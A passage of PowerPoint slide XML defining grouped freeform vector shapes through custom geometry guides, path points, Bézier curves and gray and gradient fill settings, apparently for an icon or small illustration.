                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12588"/>
                    <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12588"/>
                    <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T5" fmla="*/ 964 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T7" fmla="*/ 0 h 4342"/>
                    <a:gd name="T8" fmla="*/ 0 w 12588"/>
                    <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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Freeform 1178"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 964 h 4342"/>
                    <a:gd name="T4" fmla="*/ 0 w 12585"/>
                    <a:gd name="T5" fmla="*/ 0 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                      <a:moveTo>
                        <a:pt x="12585" y="4342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="43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Freeform 1179"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1912" y="2428"/>
                  <a:ext cx="252" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17020"/>
                    <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                    <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                    <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                    <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                    <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                    <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                    <a:gd name="T7" fmla="*/ 0 h 4567"/>
                    <a:gd name="T8" fmla="*/ 0 w 17020"/>
                    <a:gd name="T9" fmla="*/ 1711 h 45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020" h="4567">
                      <a:moveTo>
                        <a:pt x="0" y="1711"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10647" y="4567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17020" y="2859"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1711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75" name="Freeform 1180"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2283"/>
                  <a:ext cx="186" cy="243"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12585"/>
                    <a:gd name="T1" fmla="*/ 0 h 16411"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                    <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                    <a:gd name="T8" fmla="*/ 0 w 12585"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13033"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="16411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="337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76" name="Freeform 1181"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2045" y="2329"/>
                  <a:ext cx="14" cy="197"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 971"/>
                    <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                    <a:gd name="T2" fmla="*/ 971 w 971"/>
                    <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                    <a:gd name="T4" fmla="*/ 971 w 971"/>
                    <a:gd name="T5" fmla="*/ 0 h 13293"/>
                    <a:gd name="T6" fmla="*/ 0 w 971"/>
                    <a:gd name="T7" fmla="*/ 260 h 13293"/>
                    <a:gd name="T8" fmla="*/ 0 w 971"/>
                    <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                      <a:moveTo>
                        <a:pt x="0" y="13293"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="971" y="13030"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="13293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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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77" name="Freeform 1182"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2279"/>
                  <a:ext cx="200" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                    <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                    <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                    <a:gd name="T4" fmla="*/ 0 w 13556"/>
                    <a:gd name="T5" fmla="*/ 260 h 3638"/>
                    <a:gd name="T6" fmla="*/ 971 w 13556"/>
                    <a:gd name="T7" fmla="*/ 0 h 3638"/>
                    <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T9" fmla="*/ 3378 h 36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56" h="3638">
                      <a:moveTo>
                        <a:pt x="13556" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3638"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13556" y="3378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96" name="Group 1250"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4355720" y="2726946"/>
              <a:ext cx="681037" cy="520700"/>
              <a:chOff x="2724" y="1560"/>
              <a:chExt cx="429" cy="328"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="997" name="Group 1249"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2953" y="1560"/>
                <a:ext cx="155" cy="263"/>
                <a:chOff x="2953" y="1560"/>
                <a:chExt cx="155" cy="263"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1020" name="Freeform 1155"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2953" y="1603"/>
                  <a:ext cx="155" cy="121"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 237"/>
                    <a:gd name="T1" fmla="*/ 113 h 186"/>
                    <a:gd name="T2" fmla="*/ 235 w 237"/>
                    <a:gd name="T3" fmla="*/ 113 h 186"/>
                    <a:gd name="T4" fmla="*/ 225 w 237"/>
                    <a:gd name="T5" fmla="*/ 49 h 186"/>
                    <a:gd name="T6" fmla="*/ 199 w 237"/>
                    <a:gd name="T7" fmla="*/ 24 h 186"/>
                    <a:gd name="T8" fmla="*/ 156 w 237"/>
                    <a:gd name="T9" fmla="*/ 12 h 186"/>
                    <a:gd name="T10" fmla="*/ 116 w 237"/>
                    <a:gd name="T11" fmla="*/ 2 h 186"/>
                    <a:gd name="T12" fmla="*/ 87 w 237"/>
                    <a:gd name="T13" fmla="*/ 12 h 186"/>
                    <a:gd name="T14" fmla="*/ 73 w 237"/>
                    <a:gd name="T15" fmla="*/ 85 h 186"/>
                    <a:gd name="T16" fmla="*/ 73 w 237"/>
                    <a:gd name="T17" fmla="*/ 85 h 186"/>
                    <a:gd name="T18" fmla="*/ 72 w 237"/>
                    <a:gd name="T19" fmla="*/ 90 h 186"/>
                    <a:gd name="T20" fmla="*/ 21 w 237"/>
                    <a:gd name="T21" fmla="*/ 104 h 186"/>
                    <a:gd name="T22" fmla="*/ 26 w 237"/>
                    <a:gd name="T23" fmla="*/ 135 h 186"/>
                    <a:gd name="T24" fmla="*/ 80 w 237"/>
                    <a:gd name="T25" fmla="*/ 122 h 186"/>
                    <a:gd name="T26" fmla="*/ 80 w 237"/>
                    <a:gd name="T27" fmla="*/ 122 h 186"/>
                    <a:gd name="T28" fmla="*/ 86 w 237"/>
                    <a:gd name="T29" fmla="*/ 120 h 186"/>
                    <a:gd name="T30" fmla="*/ 99 w 237"/>
                    <a:gd name="T31" fmla="*/ 112 h 186"/>
                    <a:gd name="T32" fmla="*/ 104 w 237"/>
                    <a:gd name="T33" fmla="*/ 92 h 186"/>
                    <a:gd name="T34" fmla="*/ 104 w 237"/>
                    <a:gd name="T35" fmla="*/ 92 h 186"/>
                    <a:gd name="T36" fmla="*/ 110 w 237"/>
                    <a:gd name="T37" fmla="*/ 47 h 186"/>
                    <a:gd name="T38" fmla="*/ 109 w 237"/>
                    <a:gd name="T39" fmla="*/ 160 h 186"/>
                    <a:gd name="T40" fmla="*/ 119 w 237"/>
                    <a:gd name="T41" fmla="*/ 170 h 186"/>
                    <a:gd name="T42" fmla="*/ 169 w 237"/>
                    <a:gd name="T43" fmla="*/ 184 h 186"/>
                    <a:gd name="T44" fmla="*/ 196 w 237"/>
                    <a:gd name="T45" fmla="*/ 165 h 186"/>
                    <a:gd name="T46" fmla="*/ 196 w 237"/>
                    <a:gd name="T47" fmla="*/ 160 h 186"/>
                    <a:gd name="T48" fmla="*/ 216 w 237"/>
                    <a:gd name="T49" fmla="*/ 155 h 186"/>
                    <a:gd name="T50" fmla="*/ 219 w 237"/>
                    <a:gd name="T51" fmla="*/ 154 h 186"/>
                    <a:gd name="T52" fmla="*/ 232 w 237"/>
                    <a:gd name="T53" fmla="*/ 146 h 186"/>
                    <a:gd name="T54" fmla="*/ 237 w 237"/>
                    <a:gd name="T55" fmla="*/ 124 h 186"/>
                    <a:gd name="T56" fmla="*/ 235 w 237"/>
                    <a:gd name="T57" fmla="*/ 113 h 186"/>
                    <a:gd name="T58" fmla="*/ 193 w 237"/>
                    <a:gd name="T59" fmla="*/ 75 h 186"/>
                    <a:gd name="T60" fmla="*/ 194 w 237"/>
                    <a:gd name="T61" fmla="*/ 87 h 186"/>
                    <a:gd name="T62" fmla="*/ 200 w 237"/>
                    <a:gd name="T63" fmla="*/ 123 h 186"/>
                    <a:gd name="T64" fmla="*/ 196 w 237"/>
                    <a:gd name="T65" fmla="*/ 124 h 186"/>
                    <a:gd name="T66" fmla="*/ 194 w 237"/>
                    <a:gd name="T67" fmla="*/ 87 h 186"/>
                    <a:gd name="T68" fmla="*/ 193 w 237"/>
                    <a:gd name="T69" fmla="*/ 75 h 186"/>
                    <a:gd name="T70" fmla="*/ 192 w 237"/>
                    <a:gd name="T71" fmla="*/ 70 h 186"/>
                    <a:gd name="T72" fmla="*/ 193 w 237"/>
                    <a:gd name="T73" fmla="*/ 75 h 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7" h="186">
                      <a:moveTo>
                        <a:pt x="235" y="113"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="84"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="223" y="32"/>
                        <a:pt x="207" y="26"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="90" y="4"/>
                        <a:pt x="87" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="29" y="102"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="108"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="65"/>
                        <a:pt x="111" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="117"/>
                        <a:pt x="109" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="165"/>
                        <a:pt x="112" y="170"/>
                        <a:pt x="119" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="131" y="173"/>
                        <a:pt x="162" y="183"/>
                        <a:pt x="169" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="186"/>
                        <a:pt x="193" y="176"/>
                        <a:pt x="196" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="163"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="209" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="154"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="141"/>
                        <a:pt x="237" y="135"/>
                        <a:pt x="237" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="113"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="193" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="96"/>
                        <a:pt x="198" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="123"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="193" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="193" y="73"/>
                        <a:pt x="193" y="7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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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1" name="Freeform 1156"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3030" y="1595"/>
                  <a:ext cx="43" cy="27"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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5"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="48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2" name="Freeform 1157"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2977" y="1706"/>
                  <a:ext cx="104" cy="117"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 159 w 159"/>
                    <a:gd name="T1" fmla="*/ 6 h 180"/>
                    <a:gd name="T2" fmla="*/ 132 w 159"/>
                    <a:gd name="T3" fmla="*/ 21 h 180"/>
                    <a:gd name="T4" fmla="*/ 81 w 159"/>
                    <a:gd name="T5" fmla="*/ 11 h 180"/>
                    <a:gd name="T6" fmla="*/ 72 w 159"/>
                    <a:gd name="T7" fmla="*/ 0 h 180"/>
                    <a:gd name="T8" fmla="*/ 68 w 159"/>
                    <a:gd name="T9" fmla="*/ 19 h 180"/>
                    <a:gd name="T10" fmla="*/ 17 w 159"/>
                    <a:gd name="T11" fmla="*/ 32 h 180"/>
                    <a:gd name="T12" fmla="*/ 1 w 159"/>
                    <a:gd name="T13" fmla="*/ 55 h 180"/>
                    <a:gd name="T14" fmla="*/ 1 w 159"/>
                    <a:gd name="T15" fmla="*/ 145 h 180"/>
                    <a:gd name="T16" fmla="*/ 36 w 159"/>
                    <a:gd name="T17" fmla="*/ 156 h 180"/>
                    <a:gd name="T18" fmla="*/ 43 w 159"/>
                    <a:gd name="T19" fmla="*/ 145 h 180"/>
                    <a:gd name="T20" fmla="*/ 42 w 159"/>
                    <a:gd name="T21" fmla="*/ 73 h 180"/>
                    <a:gd name="T22" fmla="*/ 42 w 159"/>
                    <a:gd name="T23" fmla="*/ 73 h 180"/>
                    <a:gd name="T24" fmla="*/ 42 w 159"/>
                    <a:gd name="T25" fmla="*/ 72 h 180"/>
                    <a:gd name="T26" fmla="*/ 42 w 159"/>
                    <a:gd name="T27" fmla="*/ 66 h 180"/>
                    <a:gd name="T28" fmla="*/ 42 w 159"/>
                    <a:gd name="T29" fmla="*/ 64 h 180"/>
                    <a:gd name="T30" fmla="*/ 42 w 159"/>
                    <a:gd name="T31" fmla="*/ 63 h 180"/>
                    <a:gd name="T32" fmla="*/ 59 w 159"/>
                    <a:gd name="T33" fmla="*/ 41 h 180"/>
                    <a:gd name="T34" fmla="*/ 103 w 159"/>
                    <a:gd name="T35" fmla="*/ 30 h 180"/>
                    <a:gd name="T36" fmla="*/ 103 w 159"/>
                    <a:gd name="T37" fmla="*/ 30 h 180"/>
                    <a:gd name="T38" fmla="*/ 59 w 159"/>
                    <a:gd name="T39" fmla="*/ 41 h 180"/>
                    <a:gd name="T40" fmla="*/ 42 w 159"/>
                    <a:gd name="T41" fmla="*/ 63 h 180"/>
                    <a:gd name="T42" fmla="*/ 42 w 159"/>
                    <a:gd name="T43" fmla="*/ 71 h 180"/>
                    <a:gd name="T44" fmla="*/ 42 w 159"/>
                    <a:gd name="T45" fmla="*/ 72 h 180"/>
                    <a:gd name="T46" fmla="*/ 42 w 159"/>
                    <a:gd name="T47" fmla="*/ 77 h 180"/>
                    <a:gd name="T48" fmla="*/ 42 w 159"/>
                    <a:gd name="T49" fmla="*/ 77 h 180"/>
                    <a:gd name="T50" fmla="*/ 43 w 159"/>
                    <a:gd name="T51" fmla="*/ 154 h 180"/>
                    <a:gd name="T52" fmla="*/ 43 w 159"/>
                    <a:gd name="T53" fmla="*/ 154 h 180"/>
                    <a:gd name="T54" fmla="*/ 43 w 159"/>
                    <a:gd name="T55" fmla="*/ 157 h 180"/>
                    <a:gd name="T56" fmla="*/ 84 w 159"/>
                    <a:gd name="T57" fmla="*/ 157 h 180"/>
                    <a:gd name="T58" fmla="*/ 85 w 159"/>
                    <a:gd name="T59" fmla="*/ 77 h 180"/>
                    <a:gd name="T60" fmla="*/ 89 w 159"/>
                    <a:gd name="T61" fmla="*/ 69 h 180"/>
                    <a:gd name="T62" fmla="*/ 141 w 159"/>
                    <a:gd name="T63" fmla="*/ 55 h 180"/>
                    <a:gd name="T64" fmla="*/ 159 w 159"/>
                    <a:gd name="T65" fmla="*/ 25 h 180"/>
                    <a:gd name="T66" fmla="*/ 159 w 159"/>
                    <a:gd name="T67" fmla="*/ 8 h 180"/>
                    <a:gd name="T68" fmla="*/ 159 w 159"/>
                    <a:gd name="T69" fmla="*/ 6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9" h="180">
                      <a:moveTo>
                        <a:pt x="159" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="17"/>
                        <a:pt x="140" y="23"/>
                        <a:pt x="132" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="20"/>
                        <a:pt x="94" y="14"/>
                        <a:pt x="81" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="10"/>
                        <a:pt x="73" y="5"/>
                        <a:pt x="72" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="19"/>
                        <a:pt x="72" y="18"/>
                        <a:pt x="68" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="19"/>
                        <a:pt x="28" y="28"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="36"/>
                        <a:pt x="2" y="42"/>
                        <a:pt x="1" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="55"/>
                        <a:pt x="0" y="135"/>
                        <a:pt x="1" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="163"/>
                        <a:pt x="25" y="165"/>
                        <a:pt x="36" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="153"/>
                        <a:pt x="43" y="149"/>
                        <a:pt x="43" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="130"/>
                        <a:pt x="42" y="102"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="68"/>
                        <a:pt x="42" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="63"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="50"/>
                        <a:pt x="48" y="44"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="37"/>
                        <a:pt x="101" y="30"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="28"/>
                        <a:pt x="107" y="28"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="30"/>
                        <a:pt x="68" y="37"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="44"/>
                        <a:pt x="43" y="50"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="74"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="155"/>
                        <a:pt x="43" y="156"/>
                        <a:pt x="43" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="180"/>
                        <a:pt x="84" y="177"/>
                        <a:pt x="84" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="142"/>
                        <a:pt x="85" y="80"/>
